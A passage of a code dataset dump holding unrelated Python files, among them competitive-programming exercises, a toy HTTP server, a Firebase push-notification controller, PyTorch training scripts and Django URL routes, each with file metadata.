2\r\n\t#print(cnt)\r\n#main\r\n\r\nsiv(90000000)\r\n#print(\"hei\")\r\nprintprime(90000000)\r\n#print(\"hei\")\r\n#print(primelist[5000000-4])\r\nq = int(input())\r\nwhile q > 0:\r\n\tq -= 1\r\n\tk = int(input())\r\n\tprint(primelist[k-1])\r\n#print(cnt)","sub_path":"Category/Number Theory/SPOJ - TDKPRIME.py","file_name":"SPOJ - TDKPRIME.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"261971956","text":"#Returns index of x in arr if it is present\ndef search(arr, x):\n n = len(arr)\n for i in range(0, n):\n if (x == arr[i]):\n return i\n return -1\n\n#Input number of test cases\nt = int(input()) \n\n#One by one run for all input test cases\nfor i in range(t):\n #print(i, end =\" \")\n #Input the size of the array\n n = int(input())\n \n #Input the array\n arr = list(map(int, input().split()))\n \n #Input the element to be searched\n x = int(input())\n \n print(arr)\n print(search(arr,x))\n #print(arr)","sub_path":"SuoPlacement2019_Python/com/ikbal/ds/string/CompetitiveProgramming.py","file_name":"CompetitiveProgramming.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"55395094","text":"import numpy as np\n\n\nmatrizEjemplo = np.array([[89, 13, 23, 72],\n [29, 11, 81, 62],\n [27, 26, 88, 33],\n [ 5, 78, 11, 11]])\n\ndef solucion(A):\n n = A.shape[0]\n print(f'dimension {n}')\n sum_diagonal_principal = 0\n prod_diagonal_secundaria = 1\n # resultado2_mod_resultado1 = prod_diagonal_secundaria % sum_diagonal_principal\n\n for index, data in np.ndenumerate(A):\n # identificar el valor de i y j de cada dato de la matriz\n i = index[0]\n j = index[1] \n # identificar si un dato está en la diagonal principal\n if i == j:\n # print(\"diagonal ppal: \", data) \n sum_diagonal_principal = sum_diagonal_principal + data\n # if (n - i - 1) == j:\n if (i + j) == (n-1):\n print(\"diagonal inversa\", data)\n prod_diagonal_secundaria = prod_diagonal_secundaria * data\n\n\n print(f'suma diagonal ppal: {sum_diagonal_principal}')\n print(f'producto diagonal secundaria: {prod_diagonal_secundaria}')\n resultado2_mod_resultado1 = prod_diagonal_secundaria % sum_diagonal_principal\n print(f'modulo: {resultado2_mod_resultado1}')\n\n \n\n \n \n # return sum_diagonal_principal, prod_diagonal_secundaria, resultado2_mod_resultado1\n\nsolucion(matrizEjemplo)\n\n ","sub_path":"semana4/examenMatriz.py","file_name":"examenMatriz.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"139498303","text":"# coding = utf-8\nimport http.server\nimport os\n\n\nclass MyHTTPHandler(http.server.BaseHTTPRequestHandler):\n\n def handle(self):\n print('request:', self.request)\n print('rfile:', self.rfile)\n # print('rfile:', self.rfile)\n # print('wfile:', self.wfile)\n # self.wfile.write('

这是来自服务器的请求

'.encode('utf-8')) # 响应数据体\n # while True:\n # buffer = self.request.recv(1024*4, 0)\n # if not buffer:\n # break;\n # print(buffer.decode())\n while True:\n buffer = self.rfile.read(1024 * 4)\n if not buffer:\n break;\n print(buffer.decode())\n\n\nprint('方便kill进程的PID:', os.getpid())\nprint('启动服务器')\nserver = http.server.HTTPServer(\n server_address=('', 11111),\n RequestHandlerClass=MyHTTPHandler,\n bind_and_activate=True)\nprint('接受用户请求')\nserver.serve_forever()\nprint('服务器退出')\n","sub_path":"day04/codes/c04_httpserver_BaseHTTPRequestHandler4.py","file_name":"c04_httpserver_BaseHTTPRequestHandler4.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143059552","text":"import json\nimport logging.config\nimport os\n\n\ndef setup_logging(default_path='logging.json', default_level=logging.INFO):\n \"\"\"\n Setup logging configuration\n \"\"\"\n BASE_DIR = os.path.dirname(os.path.abspath('.'))\n CONFIG_DIR = os.path.join(BASE_DIR, \"config\")\n path = os.path.join(CONFIG_DIR, default_path)\n if os.path.exists(path):\n with open(path, 'rt') as f:\n config = json.load(f)\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n\n\ndef doSomething():\n logging.info('hello logging')\n logging.debug('这是一个bug')\n\n\nif __name__ == '__main__':\n setup_logging()\n doSomething()\n","sub_path":"InnerModule/loggerLearn2.py","file_name":"loggerLearn2.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241094911","text":"import string, time\nimport random\nimport uuid\nimport base64, re\nimport binascii\nimport aiohttp\nimport ujson\nfrom math import floor\n\nfrom gatco.response import json, text, html\nfrom application.extensions import sqlapimanager\nfrom application.models import User, Permission, Role, NotifyUser, Notify\nfrom application.extensions import auth\nfrom application.database import db, redisdb\nfrom application.server import app\nfrom gatco_restapi.helpers import to_dict\nfrom application.controllers.helper import current_uid, current_user\n\n\nasync def apply_user_filter(request=None, search_params=None, **kw):\n currentUser = await current_user(request)\n if currentUser is not None:\n search_params[\"filters\"] = {\"user_id\": {\"$eq\": str(currentUser.id)}}\n else:\n return json({\"error_code\": \"USER_NOT_FOUND\", \"error_message\": \"\"}, status=520)\n\n\nasync def send_notify_single(user_id, notify_data):\n# title = db.Column(String, index=True)\n# content = db.Column(String)\n# type = db.Column(String(20)) # text/image/video\n# url = db.Column(String)\n# action = db.Column(JSONB())\n# notify_condition = db.Column(JSONB())\n\n data = request.json\n firebase_token = redisdb.get(\"notify_token:\" + user_id)\n if firebase_token is not None:\n firebase_token = firebase_token.decode('utf8')\n\nasync def postprocess_send_notify_cosoKCB(request=None, Model=None, result=None, **kw):\n notify_condition = result[\"notify_condition\"]\n if notify_condition is not None:\n notify_user_list = []\n for condition in notify_condition:\n users = []\n if condition.get(\"notify_type\", \"\") == \"TO_ALL\":\n users = db.session.query(User).has_role(\"CoSoKCB\").all()\n\n if condition.get(\"notify_type\", \"\") == \"TO_PHONE\":\n phone_list = condition.get(\"notify_phone_number\", [])\n for phone in phone_list:\n user = db.session.query(User).filter(User.phone_number == phone).first()\n users = users.append(user)\n\n for user in users:\n notify_user = NotifyUser()\n notify_user['user_id'] = str(user.id)\n notify_user['notify_id'] = result[\"id\"]\n notify_user['notify_at'] = floor(time.time())\n db.session.add(notify_user)\n # notify user\n user_notify_token = redisdb.get(\"notify_token:\" + str(user.id))\n\n if user_notify_token is not None:\n user_notify_token = user_notify_token.decode('utf8')\n notify_user_list.append(user_notify_token)\n db.session.commit()\n noti_data = {\n \"push_type\": \"NORMAL\",\n \"notify_id\": result[\"id\"]\n }\n\n await send_firebase_notify(notify_user_list, result[\"title\"], noti_data)\n\n\nsqlapimanager.create_api(Notify, max_results_per_page=1000000,\n methods=['GET', 'POST', 'DELETE', 'PUT'],\n url_prefix='/api/v1',\n preprocess=dict(GET_SINGLE=[], GET_MANY=[], POST=[], PUT_SINGLE=[]),\n postprocess=dict(POST=[postprocess_send_notify_cosoKCB]),\n collection_name='notify')\n\nsqlapimanager.create_api(NotifyUser, max_results_per_page=1000000,\n methods=['GET', 'POST', 'DELETE', 'PUT'],\n url_prefix='/api/v1',\n preprocess=dict(GET_SINGLE=[], GET_MANY=[apply_user_filter], POST=[], PUT_SINGLE=[]),\n postprocess=dict(POST=[]),\n collection_name='notify_user')\n\n\n@app.route('/api/v1/send_notify', methods=['POST'])\nasync def send_notify(request):\n data = request.json\n phone_number = data.get(\"phone_number\", None)\n if phone_number is not None:\n user = db.session.query(User).filter(User.phone_number == phone_number).first()\n print(\"user: \", user)\n if user is not None:\n firebase_token = redisdb.get(\"notify_token:\" + str(user.id))\n print(\"firebase_token: \", firebase_token)\n if firebase_token is not None:\n firebase_token = firebase_token.decode('utf8')\n await send_firebase_notify([firebase_token], data.get(\"title\", \"Test\"), data)\n\n return json({})\n\n\n@app.route('/api/v1/set_notify_token', methods=['POST'])\nasync def set_notify_token(request):\n currentUser = await current_user(request)\n if currentUser is None:\n return json({\n \"error_code\": \"USER_NOT_LOGIN\",\n \"error_message\": None\n }, status=520)\n\n data = request.json\n token = data.get(\"data\", None)\n redisdb.set(\"notify_token:\" + str(currentUser.id), token)\n\n return json({})\n\n\n@app.route('/api/v1/test_notify', methods=['POST'])\nasync def test_notify(request):\n currentUser = await current_user(request)\n if currentUser is None:\n return json({\n \"error_code\": \"USER_NOT_LOGIN\",\n \"error_message\": None\n }, status=520)\n \n data = request.json\n firebase_token = redisdb.get(\"notify_token:\" + str(currentUser.id))\n if firebase_token is not None:\n firebase_token = firebase_token.decode('utf8')\n\n# data = {\n# \"data\": {\n# \"push_type\": \"UPDATE_TRANSACTION\",\n# \"transaction_hash\": transaction_hash,\n# \"title\": body\n# },\n# \"notification\" : {\n# \"body\": body,\n# \"sound\": \"bell.mp3\"\n# },\n# \"registration_ids\": [from_token]\n# }\n\n await send_firebase_notify([firebase_token], data.get(\"title\", \"Thông báo\"), data)\n\n return json({})\n else:\n return json({\"error_code\": \"KEY_NOT_SET\", \"error_message\": \"\"}, status=520)\n\n\nasync def send_firebase_notify(firebase_tokens, body, data):\n server_key = app.config.get(\"FIREBASE_SERVER_KEY\")\n fb_headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"key=\" + server_key\n }\n\n url = \"https://fcm.googleapis.com/fcm/send\"\n\n if \"title\" not in data:\n data[\"title\"] = body\n\n params = {\n \"data\": data,\n \"notification\": {\n \"body\": body,\n \"sound\": \"bell.mp3\"\n },\n \"registration_ids\": firebase_tokens # this is list token [token]\n }\n\n print(\"send_firebase_notify param: \", params)\n\n async with aiohttp.ClientSession(headers=fb_headers, json_serialize=ujson.dumps) as session:\n async with session.post(url, json=params) as response:\n # if response.status == 200:\n await response.json()\n","sub_path":"application/controllers/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":6762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"453518677","text":"\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import integrate\n\n\n\ndef readRawData(rawmap):\n '''\n :param rawmap\n :return: array with points [(x1,y1),(x2,y2), ... , (xn,yn)]\n '''\n r = open(rawmap, 'r')\n with r as f:\n map = []\n for line in f:\n line = line.split() # to deal with blank\n if line:\n line = [float(i) for i in line]\n map.append(line)\n return np.array(map)\n\n\ndef ordinary_LR( coord, order, p):\n '''\n Regression such that y(x=0)=0\n Assumed data is a n x 2 matrix of vector coordinates (x_i,y_i)\n returns beta = [b_0,b_1,..., b_k]\n\n data_x = x_0, x_1, ... , x_n\n data_y = y_0, y_1, ... , y_n\n\n '''\n q = order\n data_x = coord.T[0]\n data_y = coord.T[1]\n\n n = len(data_x)\n\n # n rows, q columns\n X = np.zeros((n, q))\n\n # X Matrix; X[i][0] = 0 , X[i][1] = X_i^1 , X[i][2] = X_i^2, ... , X[i][k] = X_i^q\n for i in range(0, n): # rows\n for j in range(0, q): # columns\n X[i][j] = data_x[i] ** (j+1)\n\n temp = np.matmul(X.T, X)\n temp = np.matmul(np.linalg.inv(temp), X.T)\n b = np.append([0], np.matmul(temp, data_y))\n\n\n return b\n\n\ndef cart2polar(C): # Transforming cartesian to polar, (-pi,pi)\n\n r = (C.T[0] ** 2 + C.T[1] ** 2) ** (1 / 2)\n P = np.zeros((len(C), 2))\n P.T[0] = r\n\n # Finding relation between x and y\n for i in range(len(C)):\n if (C[i][0] == 0) and (C[i][1] != 0):\n P[i][1] = np.pi / 2\n elif (C[i][1] == 0) and (C[i][0] == 0):\n P[i][1] = 0\n else:\n P[i][1] = np.arctan(abs(C[i][1] / C[i][0]))\n\n # Checking for every quadrant to get the correct angle theta_cone\n if (C[i][0] >= 0) and (C[i][1] > 0):\n P[i][1] = P[i][1]\n\n elif (C[i][0] < 0) and (C[i][1] <= 0):\n P[i][1] = P[i][1] - np.pi\n\n elif (C[i][0] >= 0) and (C[i][1] < 0):\n P[i][1] = - P[i][1]\n\n elif (C[i][0] < 0) and (C[i][1] >= 0):\n P[i][1] = np.pi - P[i][1]\n\n return P\n\n\n\n\ndef arcLengthSimpsonsMethod2(b, x_1):\n\n n = 10\n x_0 = 0\n h = (x_0 - x_1)/n\n\n def f(x):\n if len(b)>2:\n return b[0] + b[1]*x + b[2]*x**2\n else:\n return b[0] + b[1] * x\n def df(x):\n return (f(x+h) - f(x))/h\n def l(x):\n return np.sqrt(1+df(x)**2)\n\n L,e = integrate.quad(l, x_0, x_1)\n\n return L\n\n\n\n\n\n\n\n#b = np.array([0,1/2,1])\n#arcLengthSimpsonsMethod2(b,4)\n\n#SimpsonsMethod2(b,1)\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"101409267","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\nfrom dataset import MyDataset\nfrom supervised_model import SModel\n\nprefix = \"/home/r720/Data/imagedata/\"\ntraindir = prefix + \"train/\"\nvaldir = prefix + \"val/\"\n\n\ndef train_label_transformer(data):\n return data * (1 + (np.random.randint(-5, 6) / 100) )\n\n\ndef fake_transformer(data):\n return data\n\n\ndef train_img_transformer(data):\n return data / 127.5 - 1\n\n\nimg_trans = transforms.Compose([\n # transforms.Resize(60, 200),\n transforms.ToTensor()\n # transforms.Normalize(mean = (0.5, 0.5, 0.5), std = (0.5, 0.5, 0.5))\n])\n\nlabel_trans = transforms.Compose([\n train_label_transformer\n])\ndef train(model, device, train_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n l2_reg = torch.autograd.Variable(torch.FloatTensor(1), requires_grad=True).to(device)\n # print(data.shape, target.shape)\n target = target.reshape((target.shape[0], 1))\n target = target.float()\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n # print(output)\n # print(target)\n # loss = nn.MSELoss()(output, target)\n for w in model.parameters():\n # print(w)\n l2_reg = l2_reg + w.norm(2)\n # print(len(data))\n loss = (1 / len(data)) * (target - output).pow(2).sum() + l2_reg * 0.001\n loss.backward()\n optimizer.step()\n if batch_idx % 10 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\ndef val(model, device, val_loader):\n model.eval()\n for batch_idx, (data, target) in enumerate(val_loader):\n data, target = data.to(device), target.to(device)\n output = model(data)\n loss = nn.MSELoss(output, target)\n print('Train Epoch: {} Val Loss: {:.7f}'.format(epoch, loss.item()))\n break\n\ndevice = torch.device('cuda:0')\nmodel = SModel()\n# model.load_state_dict(torch.load(\"nvidiasmodel/nvidia-200.dat\"))\nmodel.to(device)\nmodel.train()\n\ntraindata = MyDataset(traindir, transform=img_trans, target_transform=label_trans)\nvaldata = MyDataset(valdir, transform=img_trans, target_transform=transforms.ToTensor)\ntrain_loader = DataLoader(traindata, 64, True)\nval_loader = DataLoader(valdata, 64, True)\n\nepochs = 300\noptimizer = optim.Adam(model.parameters(), lr=0.00001)\nfor epoch in range(epochs):\n train(model, device, train_loader, optimizer, epoch)\n if epoch % 100 == 0:\n # model.eval()\n # for images, labels in dataloader(valdir, valfiles, len(valfiles), \"val\"):\n # ps = model(images)\n # print(\"epoch {} val loss {}\".format(i, loss_func(ps, labels)))\n state = model.state_dict()\n for key in state: state[key] = state[key].clone().cpu()\n torch.save(state, 'nvidiasmodel/{0}-{1}.dat'.format(\"nvidial2\", epoch))","sub_path":"supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610401890","text":"import logging\nimport os\nimport sys\nimport h5py\nimport argparse\n\nimport numpy as np\nimport torch\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader, sampler\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.tensorboard.writer import SummaryWriter\n\nimport indexedconv.utils as utils\nfrom indexedconv.nets.aid import WideNetMasked\n\n\ndef train(model, device, train_loader, optimizer, epoch, writer=None):\n model.train()\n loss_values = []\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss_values.append(loss.item())\n loss.backward()\n optimizer.step()\n if batch_idx % 20 == 0:\n logger.info('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.sampler),\n 100. * batch_idx / len(train_loader), loss.item()))\n if writer:\n writer.add_scalars('Loss', {'training': np.mean(loss_values)}, epoch)\n\n\ndef test(model, device, test_loader, epoch, val=True, writer=None):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, size_average=False).item() # sum up batch loss\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.sampler)\n accuracy = 100. * correct / len(test_loader.sampler)\n if val:\n logger.info('Validation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(\n test_loss, correct, len(test_loader.sampler), accuracy))\n if writer:\n writer.add_scalars('Loss', {'validating': test_loss}, epoch)\n writer.add_scalar('Accuracy', accuracy, epoch)\n else:\n logger.info('Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(\n test_loss, correct, len(test_loader.sampler), accuracy))\n\n\nif __name__ == '__main__':\n\n description = 'Demonstration of the use of masked convolution on hexagonal images. A ResNet like network is ' \\\n 'trained for a classification task on the AID dataset.'\n # Parse script arguments\n print('parse arguments')\n parser = argparse.ArgumentParser(\n description=description\n )\n parser.add_argument(\"main_directory\", help=\"path to the main directory of the experiments\")\n parser.add_argument(\"data_directory\", help=\"path to the data directory\")\n parser.add_argument(\"exp_name\", help=\"name of the experiment\")\n parser.add_argument('--batch', help='batch size', type=int, default=125)\n parser.add_argument('--epochs', help='number of epochs', type=int, default=300)\n parser.add_argument('--seeds', nargs='+', help='seeds to use, one training per seed', type=int,\n default=range(1, 11))\n parser.add_argument('--device', help='device to use, for example cpu or cuda:0', type=str, default='cuda:0')\n parser.add_argument('--size', help='size of the resized AID images', type=int, default=64)\n parser.add_argument('--val_ratio', help='validating ratio', type=float, default=0.2)\n\n args = parser.parse_args()\n\n main_directory = args.main_directory\n data_directory = args.data_directory\n experiment_name = args.exp_name\n batch_size = args.batch\n max_epochs = args.epochs\n seeds = args.seeds\n device = torch.device(args.device)\n resize_size = (args.size, args.size)\n validating_ratio = args.val_ratio\n\n if not os.path.exists(main_directory):\n os.makedirs(main_directory)\n\n experiment_directory = main_directory + '/' + experiment_name\n if not os.path.exists(experiment_directory):\n os.makedirs(experiment_directory)\n\n # Logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter('[%(levelname)s] - %(message)s')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n formatter_file = logging.Formatter('%(asctime)s [%(levelname)s] - %(message)s')\n file_handler = logging.FileHandler('{}/{}/{}.log'.format(main_directory,\n experiment_name,\n experiment_name))\n file_handler.setFormatter(formatter_file)\n logger.addHandler(file_handler)\n\n # Experiment parameters\n logger.info('batch_size : {}'.format(batch_size))\n logger.info('max_epochs : {}'.format(max_epochs))\n logger.info('cuda available : {}'.format(torch.cuda.is_available()))\n\n # Data\n logger.info('Axial AID with nn.conv2d masked')\n\n if not os.path.exists(data_directory + '/aid' + str(resize_size[0]) + '_hexa.h5'):\n logger.info('Create hexagonal AID dataset')\n img, _ = datasets.ImageFolder(data_directory + '/AID',\n transform=transforms.Compose([transforms.Resize(resize_size),\n transforms.ToTensor()]))[0]\n index_matrix = utils.square_to_hexagonal_index_matrix(img)\n aid = datasets.ImageFolder(data_directory + '/AID',\n transform=transforms.Compose([transforms.Resize(resize_size),\n transforms.ToTensor(),\n utils.SquareToHexa()]))\n with h5py.File(data_directory + '/aid' + str(resize_size[0]) + '_hexa.h5', 'w') as f:\n images = []\n labels = []\n for i in range(len(aid)):\n image, label = aid[i]\n images.append(image.numpy())\n labels.append(label)\n f.create_dataset('images', data=np.array(images))\n f.create_dataset('labels', data=np.array(labels))\n f.attrs['index_matrix'] = index_matrix\n f.attrs['class_names'] = np.array(aid.classes, dtype=h5py.special_dtype(vlen=str))\n\n # load hexagonal cifar\n f = h5py.File(data_directory + '/aid' + str(resize_size[0]) + '_hexa.h5', 'r')\n data = f['images'][()]\n labels = f['labels'][()]\n index_matrix = torch.tensor(f.attrs['index_matrix'])\n class_names = f.attrs['class_names']\n f.close()\n\n # Normalize data\n data = utils.normalize(data)\n\n data_shifted = np.zeros(data.shape[0:2] + index_matrix.shape).astype(np.float32)\n for i in range(index_matrix.shape[0]):\n for j in range(index_matrix.shape[1]):\n if not int(index_matrix[i, j]) == -1:\n data_shifted[:, :, i, j] = data[:, :, int(index_matrix[i, j])]\n\n # Datasets\n dataset = utils.NumpyDataset(data_shifted, labels, transform=utils.NumpyToTensor())\n\n # Run the experiments\n for seed in seeds:\n # Data loaders\n logger.info('Split data with seed {}'.format(seed))\n torch.manual_seed(seed)\n np.random.seed(seed)\n train_indices = []\n val_indices = []\n for cls in np.unique(labels):\n indices = np.where(labels == cls)\n indices = np.random.permutation(indices[0])\n train_indices.append(indices[:int(len(indices) * (1 - validating_ratio))])\n val_indices.append(indices[int(len(indices) * (1 - validating_ratio)):])\n train_set_sampler = sampler.SubsetRandomSampler(np.concatenate(train_indices))\n validating_set_sampler = sampler.SubsetRandomSampler(np.concatenate(val_indices))\n train_loader = DataLoader(dataset, batch_size=batch_size, sampler=train_set_sampler, num_workers=8)\n val_loader = DataLoader(dataset, batch_size=batch_size, sampler=validating_set_sampler, num_workers=8)\n\n # TensorboardX writer\n writer = SummaryWriter(main_directory + '/runs/' + experiment_name + '_' + str(seed))\n\n # The model\n torch.manual_seed(0)\n model = WideNetMasked(len(class_names)).to(device)\n logger.info('Net parameters number : {}'.format(utils.compute_total_parameter_number(model)))\n\n optimizer = optim.SGD(model.parameters(), lr=0.05, momentum=0.9, weight_decay=0.001)\n scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[50, 100, 150], gamma=0.1)\n\n # Train and test\n logger.info('Start training')\n for epoch in range(1, max_epochs + 1):\n gpu_map = utils.get_gpu_usage_map(0)\n logger.info('GPU usage : {}'.format(gpu_map))\n train(model, device, train_loader, optimizer, epoch, writer=writer)\n test(model, device, val_loader, epoch, writer=writer)\n scheduler.step(epoch=epoch)\n if epoch % 100 == 0:\n torch.save(model.state_dict(), experiment_directory + '/model_' + str(seed) + '_epoch_' + str(epoch))\n\n writer.close()\n","sub_path":"examples/aid_standard_masked.py","file_name":"aid_standard_masked.py","file_ext":"py","file_size_in_byte":9222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"351420490","text":"\"\"\"\nType instances should have raw-bytes easily available without the \"type/length\" header.\n\"\"\"\nimport pytest\n\nimport x690.types as t\n\n\n@pytest.mark.parametrize(\"cls\", t.Type.all())\ndef test_raw_bytes(cls):\n try:\n instance = cls.decode(b\"\")\n except NotImplementedError:\n raise pytest.skip(\"Not yet implemented\")\n assert instance.raw_bytes == b\"\"\n\n\n@pytest.mark.parametrize(\"cls\", t.Type.all())\ndef test_raw_bytes(cls):\n instance = cls()\n assert isinstance(instance.raw_bytes, bytes)\n","sub_path":"tests/test_rawbytes.py","file_name":"test_rawbytes.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"106266927","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 10 00:54:35 2019\n\n@author: HP\n\"\"\"\n\n# 1) OdevODEV 1: Asagida ozellikleri belirtilen 4 fonksiyon belirtiniz.\n\n# Tek sayi kontrolu yapan fonksiyon,\n# Cift sayi kontrolu yapan fonksiyon,\n# 3’e bolunme kontrolu yapan fonksiyon,\n# 5’e bolunme kontrolu yapan fonksiyon.\n# Bunlardan ayri 5. bir fonksiyon yazin ve bu ilksayi ve sonsayi seklinde iki parametre alsin.\n\n# Yukarida olusturdugunuz ilk 4 fonksiyonu son olusturdugunuz fonksiyonun icinde calistirarak islemler yapiniz. \n# Fonksiyon verdiginiz baslangic ve bitis sayilarina gore bir liste olusturmali ve \n# listenin icindeki sayilari tek - cift - 3'un kati - 5'in kati durumlarina gore kontrol etmeli. \n# Uygun durumlarda ilgili fonksiyonu cagirip o duruma iliskin bir cikti vermeli.\n\n\nilksayi=int(input(\"Baslangic Sayisi =\"))\nsonsayi=int(input(\"Bitis Sayisi =\"))\nif ilksayi>sonsayi:\n ilksayi,sonsayi=sonsayi,ilksayi\ndef sayi_kontrol(ilksayi,sonsayi):\n liste = list(range(ilksayi,sonsayi))\n print(\"\\nListe =\",liste,'\\n')\n Tek =list(map(lambda x: f'{x} tek sayidir\\n' , filter(lambda a: a % 2 == 1, liste)))\n Cift =list(map(lambda y: f'{y} cift sayidir\\n' , filter(lambda b: b % 2 == 0, liste)))\n Uckat =list(map(lambda z: f'{z} ucun katidir\\n' , filter(lambda c: c % 3 == 0, liste)))\n Beskat=list(map(lambda t: f'{t} besin katidir\\n', filter(lambda d: d % 5 == 0, liste)))\n print(*Tek,*Cift,*Uckat,*Beskat)\nsayi_kontrol(ilksayi,sonsayi) \n\n\n# %% Fonksiyonlari 5.fonksiyonda cagirarak;\n\ntek =lambda a: a % 2 == 1\ncift =lambda b: b % 2 == 0\nuckat =lambda c: c % 3 == 0\nbeskat=lambda d: d % 5 == 0\n\nilksayi=int(input(\"Baslangic Sayisi =\"))\nsonsayi=int(input(\"Bitis Sayisi =\"))\nif ilksayi>sonsayi:\n ilksayi,sonsayi=sonsayi,ilksayi\nprint('\\nSonuclar...;')\ndef secim(ilksayi,sonsayi):\n for sayi in range(ilksayi,sonsayi):\n if tek(sayi)==True:\n print(f'{sayi} tekdir')\n if cift(sayi)==True:\n print(f'{sayi} cifttir')\n if uckat(sayi)==True:\n print(f'{sayi} ucun katidir')\n if beskat(sayi)==True:\n print(f'{sayi} besin katidir')\nsecim(ilksayi,sonsayi)\n \n\n# %% Ucuncu yol fonksiyon tanimlayarak;\n\ndef ciftek(sayi):\n if sayi % 2 == 0:\n print(f'{sayi} cift sayidir...')\n else:\n print(f'{sayi} tek sayidir...')\n\ndef ucmu(sayi):\n if sayi % 3 == 0:\n print(f'{sayi} ucun katidir...')\n\ndef besmi(sayi):\n if sayi % 5 == 0:\n print(f'{sayi} besin katidir...')\n \n \n\nilksayi=int(input(\"Baslangic Sayisi =\"))\nsonsayi=int(input(\"Bitis Sayisi =\"))\nif ilksayi>sonsayi:\n ilksayi,sonsayi=sonsayi,ilksayi\n\ndef sayi_kontrol(ilksayi,sonsayi):\n liste = list(range(ilksayi,sonsayi))\n print(\"\\nListe =\",liste,'\\n')\n for sayi in liste:\n ciftek(sayi)\n ucmu(sayi)\n besmi(sayi)\n \nsayi_kontrol(ilksayi,sonsayi) \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Odev1.py","file_name":"Odev1.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519376261","text":"from django.conf.urls import url, include\nfrom app import views\n\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n url(r'^demo$', views.test, name=\"test\"),\n url(r'^signup$', views.signup, name=\"signup\"),\n url(r'^login$', views.login, name=\"login\"),\n url(r'^add-blog$', views.add_blog, name=\"add_blog\"),\n url(r'^list-all-blog$', views.list_all_blog, name=\"list_all_blog\"),\n url(r'^detail-blog$', views.detail_blog, name=\"detail_blog\"),\n url(r'^detail-blog/edit-blog$', views.edit_blog, name=\"edit_blog\"),\n url(r'^detail-blog/delete$', views.delete_blog, name=\"delete_blog\"),\n url(r'^detail-blog/comment$', views.comment, name=\"comment\"),\n url(r'^detail-blog/get-comment$', views.get_comment, name=\"get_comment\"),\n url(r'^detail-blog/reply$', views.reply, name=\"reply\"),\n url(r'^detail-blog/get-reply$', views.get_reply, name=\"get_reply\"),\n url(r'^detail-blog/like$', views.like, name=\"like\"),\n url(r'^detail-blog/like-reply$', views.like_reply, name=\"like_reply\"),\n url(r'^home/upload-image$', views.upload_image, name=\"upload_image\"),\n url(r'^home/add-blog$', views.add_blog, name=\"add_blog\"),\n url(r'^home/change-rate$', views.change_rate, name=\"change_rate\"),\n url(r'^search$', views.search, name=\"search\"),\n]\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529978123","text":"def filter_list(l):\n #return a new list with the strings filtered out'\n for i in range(len(l)-1, -1, -1):\n try:\n if len(l[i]) > 0 : l.remove(l[i])\n except : continue\n return l\n\n#use isinstance of method\n#return [i for i in l if not isinstance(i, str)]\n\ntestcase = 